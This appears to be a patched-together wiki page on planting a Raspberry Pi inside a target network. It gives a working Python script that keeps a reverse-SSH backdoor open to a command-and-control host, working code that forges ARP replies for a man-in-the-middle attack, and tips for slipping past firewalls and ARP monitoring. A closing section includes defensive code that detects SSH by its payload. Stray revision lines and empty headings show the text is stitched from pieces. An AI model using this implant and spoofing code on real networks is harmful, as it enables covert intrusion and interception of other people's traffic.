===Getting a Reverse Shell to the Pi===


How do you control the Pi once it is placed on a target network? SSH is the obvious way.
The [[RaspberryPi/Reverse SSH]] page has instructions for a startup executable on the Raspberry Pi that opens a reverse SSH connection to an outside command and control server. That gives you a backdoor SSH shell onboard the Raspberry Pi.
 
Inbound SSH connections to the Pi will usually be blocked: the target network sits behind a firewall or NAT that drops unsolicited inbound connections, while outbound connections are generally allowed.
Reverse SSH turns the connection around so that only an outbound connection is needed to get an SSH shell.
 
Reverse SSH: instead of the command and control server connecting to the Raspberry Pi, the Raspberry Pi initiates the connection to the command and control server and carries a tunnel back to its own SSH daemon inside it. This is the same call-home technique used by many backdoor programs.
 
===SSH Command===
 
The command and control server runs an SSH daemon and waits for the Pi. When the Pi comes online, it runs the ssh command and connects out to the command and control server.
 
Normally, when you SSH to a machine, you execute a command like:
 
<pre>
$ ssh user@remoteserver
</pre>
 
Adding the <code>-R</code> flag makes the remote server open a listening port and forward every connection to it back through the tunnel:
 
<pre>
$ ssh  -R  [bind_address:]port:host:hostport  username@remoteserver
</pre>
 
Let's ignore <code>bind_address</code> for now. (By default the listening port on the remote server is bound to its loopback interface only, so it can be reached from a shell on that server but not from outside; the sshd setting <code>GatewayPorts</code> controls whether other addresses may be used.)
 
<code>port</code> is the port that sshd on the command and control server opens and listens on. Every connection made to that port on the command and control server is carried back through the SSH session to the Raspberry Pi.
 
<code>host:hostport</code> is where the Pi delivers those connections. It is resolved from the Pi's side of the tunnel, so <code>localhost:22</code> means the Pi's own SSH daemon. With <code>-R 2222:localhost:22</code>, for example, running <code>ssh -p 2222 pi@localhost</code> on the command and control server lands you in a shell on the Pi (assuming the Pi's user is <code>pi</code>).
 
Note that <code>port</code> has nothing to do with getting out of the target network. What has to get out is the SSH connection itself, which goes to whatever port sshd on the command and control server listens on: 22 by default, and port 22 may well be blocked outbound by the firewall on the network the Pi is on. Run sshd on the command and control server on a port you know will be open (443 is a common choice) and select it on the Pi with <code>-p</code>.
 
Finally, <code>username@remoteserver</code> is the account and address on the command and control server used to establish the SSH connection in the first place.
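A Python version of the startup executable described above, added here as an example (it is not the page's script and not the one on the RaspberryPi/Reverse SSH page): it assembles the reverse-tunnel command line with the argument meanings explained above and restarts ssh with a capped backoff whenever the connection drops. The host name c2.example.org, the account tunnel, port 443 for the C2 sshd, port 2222 for the forwarded listener and the key path are assumed values for illustration.

```python
import subprocess
import time

# Assumed values for illustration; none of them come from the page.
C2_HOST = "c2.example.org"
C2_USER = "tunnel"
C2_SSH_PORT = 443          # sshd on the C2 listens here because 443 is usually open outbound
REMOTE_PORT = 2222         # port that -R opens on the C2's loopback interface
LOCAL_PORT = 22            # the Pi's own sshd, i.e. host:hostport = localhost:22
IDENTITY = "/home/pi/.ssh/id_ed25519"   # assumed key path; authorized on the C2


def build_ssh_argv(c2_host=C2_HOST, c2_user=C2_USER, c2_port=C2_SSH_PORT,
                   remote_port=REMOTE_PORT, local_port=LOCAL_PORT, identity=IDENTITY):
    """Argument vector for the outbound SSH session that carries the reverse tunnel."""
    return [
        "ssh",
        "-N",                                   # no remote command: tunnel only
        "-i", identity,
        "-p", str(c2_port),                     # egress port, not the forwarded port
        "-R", f"{remote_port}:localhost:{local_port}",
        "-o", "BatchMode=yes",                  # never prompt; we run unattended
        "-o", "ExitOnForwardFailure=yes",       # die (and get restarted) if -R cannot bind
        "-o", "ServerAliveInterval=30",         # notice a dead connection within ~90 s
        "-o", "ServerAliveCountMax=3",
        "-o", "StrictHostKeyChecking=yes",      # C2 host key must already be in known_hosts
        f"{c2_user}@{c2_host}",
    ]


def next_backoff(current, cap=300):
    """Double the reconnect delay up to a cap so a down C2 is not hammered."""
    return min(current * 2, cap)


def keep_tunnel_up(argv, max_attempts=None):
    """Run ssh, and when it exits (network change, C2 reboot, idle timeout)
    wait and run it again. max_attempts=None means forever."""
    delay = 5
    attempts = 0
    while max_attempts is None or attempts < max_attempts:
        attempts += 1
        started = time.monotonic()
        subprocess.call(argv)
        if time.monotonic() - started > 60:
            delay = 5            # the tunnel held for a while: reset the backoff
        time.sleep(delay)
        delay = next_backoff(delay)


if __name__ == "__main__":
    keep_tunnel_up(build_ssh_argv())
```

On the command and control server the operator then runs `ssh -p 2222 pi@localhost` to reach the Pi. The private key on the Pi is a credential for the C2 and will be captured if the Pi is found, so the matching authorized_keys line on the C2 should be prefixed with `restrict,port-forwarding`, which allows the tunnel and nothing else (no shell, no agent or X11 forwarding) for that key.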
 

Revision as of 06:02, 4 August 2015

What It Is

A man-in-the-middle attack is a general concept from cryptography. Two parties, Alice and Bob, try to have an encrypted conversation, but an attacker, Eve, inserts herself between them and relays their messages. Alice ends up sharing one encryption key with Eve, and Bob shares a different key with Eve, while each believes they are talking directly to the other. Everything that passes between them can be read and altered by Eve.

Wired Network

This is a man-in-the-middle attack using ARP spoofing on a wired network. The configuration:

+----[Target laptop]
|
|      +---[Raspberry Pi]
|      |
|      |
[Router]

How It Will Work

This (wired) man-in-the-middle attack works by ARP spoofing: the Pi sends forged ARP replies so that the target's ARP cache maps the router's IP address to the Pi's MAC address, and the router's ARP cache maps the target's IP address to the Pi's MAC address. Both sides then hand their traffic to the Pi, which forwards it on to the real destination. IP forwarding must be enabled on the Pi before the poisoning starts, or the target simply loses its connection and the attack is noticed immediately.
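What the Pi actually puts on the wire, as an added example that is not the page's own code: the script builds the two forged ARP replies described above from raw bytes (no scapy needed), a parser to check them, the matching "restore" replies to send when finishing, and a resend loop, since ARP cache entries expire and a single reply is not enough. The MAC and IP addresses in the main block are constructed placeholders; the interface name eth0 and the sending loop assume Linux (AF_PACKET) and root.

```python
import socket
import struct
import time

ETH_P_ARP = 0x0806          # EtherType for ARP
ARP_REPLY = 2               # ARP opcode "reply"


def mac_bytes(mac: str) -> bytes:
    """'aa:bb:cc:dd:ee:ff' -> 6 raw bytes."""
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def arp_reply(sender_mac, sender_ip, target_mac, target_ip) -> bytes:
    """One Ethernet frame carrying an unsolicited ARP reply that claims
    'sender_ip is at sender_mac', addressed to target_mac / target_ip."""
    eth_header = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    # htype=1 (Ethernet), ptype=0x0800 (IPv4), hlen=6, plen=4, opcode
    arp_header = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)
    arp_body = (mac_bytes(sender_mac) + socket.inet_aton(sender_ip)
                + mac_bytes(target_mac) + socket.inet_aton(target_ip))
    return eth_header + arp_header + arp_body


def parse_arp(frame: bytes) -> dict:
    """Decode a 42-byte Ethernet+ARP frame; used to verify what was built."""
    eth_dst, eth_src, ethertype = struct.unpack("!6s6sH", frame[:14])
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    sha, spa, tha, tpa = struct.unpack("!6s4s6s4s", frame[22:42])
    return {
        "eth_dst": mac_str(eth_dst), "eth_src": mac_str(eth_src), "ethertype": ethertype,
        "op": op,
        "sha": mac_str(sha), "spa": socket.inet_ntoa(spa),
        "tha": mac_str(tha), "tpa": socket.inet_ntoa(tpa),
    }


def poison_frames(pi_mac, target_mac, target_ip, router_mac, router_ip):
    """The pair of forged replies that puts the Pi between target and router:
    the target is told the router's IP lives at the Pi's MAC, and the router
    is told the target's IP lives at the Pi's MAC."""
    to_target = arp_reply(pi_mac, router_ip, target_mac, target_ip)
    to_router = arp_reply(pi_mac, target_ip, router_mac, router_ip)
    return to_target, to_router


def restore_frames(target_mac, target_ip, router_mac, router_ip):
    """Truthful replies to send when done, so both caches heal at once
    instead of waiting for the poisoned entries to time out."""
    to_target = arp_reply(router_mac, router_ip, target_mac, target_ip)
    to_router = arp_reply(target_mac, target_ip, router_mac, router_ip)
    return to_target, to_router


def send_loop(iface, frames, interval=2.0, rounds=None):
    """Resend the frames every `interval` seconds (rounds=None: forever).
    Linux only, needs CAP_NET_RAW, and net.ipv4.ip_forward must be 1 first."""
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ETH_P_ARP)) as sock:
        sock.bind((iface, 0))
        sent = 0
        while rounds is None or sent < rounds:
            for frame in frames:
                sock.send(frame)
            sent += 1
            time.sleep(interval)


if __name__ == "__main__":
    # Constructed placeholder addresses; on a real network take them from
    # `ip neigh` on the Pi.
    PI_MAC = "b8:27:eb:00:00:01"
    TARGET_MAC, TARGET_IP = "00:11:22:33:44:55", "192.168.1.10"
    ROUTER_MAC, ROUTER_IP = "aa:bb:cc:dd:ee:ff", "192.168.1.1"
    frames = poison_frames(PI_MAC, TARGET_MAC, TARGET_IP, ROUTER_MAC, ROUTER_IP)
    for f in frames:
        print(parse_arp(f))
    # send_loop("eth0", frames)   # run as root on the Pi; Ctrl-C, then send restore_frames(...)
```

The frame to the target is unicast to the target's MAC rather than broadcast, which keeps the forged mapping off the router's own port and out of any switch-wide ARP monitoring that only looks at broadcasts.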

Preparing the Pi

First, plug the Pi into the router.


Circumventing IDS

Intrusion detection systems can recognize SSH traffic by what it looks like rather than by port number. Every SSH session opens with a cleartext identification string ("SSH-2.0-..." followed by the software version) in the first bytes sent by each side, so moving the connection to port 443 does not by itself hide it from an IDS that does protocol detection on payload.
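The detection logic in miniature, added here as an example and not taken from any IDS or from the page: it checks the first payload bytes of each flow for the SSH identification string defined in RFC 4253 section 4.2 and flags SSH on any port, labelling non-22 ports separately. The flows in SAMPLE_FLOWS are constructed for the example, including a Pi calling home to port 443 and a TLS ClientHello on the same port for comparison.

```python
import re

# RFC 4253 section 4.2: "SSH-protoversion-softwareversion" plus optional
# comments, printable ASCII, terminated by CR LF, at most 255 bytes in all.
SSH_IDENT = re.compile(rb"^SSH-(?:1\.99|2\.0)-[\x20-\x7e]{1,245}$")


def ssh_identification(first_bytes: bytes):
    """Return the identification string if the start of this payload is an
    SSH session, else None. A server may precede its string with a few
    banner lines, so the first eight lines are inspected."""
    for line in first_bytes.split(b"\n")[:8]:
        line = line.rstrip(b"\r")
        if SSH_IDENT.match(line):
            return line.decode("ascii")
    return None


def classify_flows(flows):
    """flows: iterable of (src, dst, dst_port, first_payload_bytes).
    Returns one alert tuple per flow that opens as SSH, whatever the port."""
    alerts = []
    for src, dst, dport, payload in flows:
        ident = ssh_identification(payload)
        if ident is None:
            continue
        kind = "ssh-standard-port" if dport == 22 else "ssh-nonstandard-port"
        alerts.append((kind, src, dst, dport, ident))
    return alerts


# Constructed sample flows (first packet of client payload only).
SAMPLE_FLOWS = [
    # the Pi calling home over 443: looks like SSH, not like TLS
    ("10.0.0.23", "203.0.113.5", 443, b"SSH-2.0-OpenSSH_6.7p1 Raspbian-5\r\n"),
    # a real TLS ClientHello on 443 for comparison (record header bytes only)
    ("10.0.0.23", "203.0.113.5", 443, b"\x16\x03\x01\x00\xa5\x01\x00\x00\xa1\x03\x03"),
    # ordinary SSH to port 22
    ("10.0.0.8", "10.0.0.1", 22, b"SSH-2.0-PuTTY_Release_0.64\r\n"),
    # plain HTTP
    ("10.0.0.8", "10.0.0.1", 80, b"GET / HTTP/1.1\r\nHost: 10.0.0.1\r\n\r\n"),
]


if __name__ == "__main__":
    for alert in classify_flows(SAMPLE_FLOWS):
        print(alert)
```

A port-only rule ("alert on dst port 22") misses the first flow entirely; the payload check catches it because the identification string is sent in the clear before any key exchange happens, and the Pi cannot avoid sending it while still speaking SSH.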

Wireless Network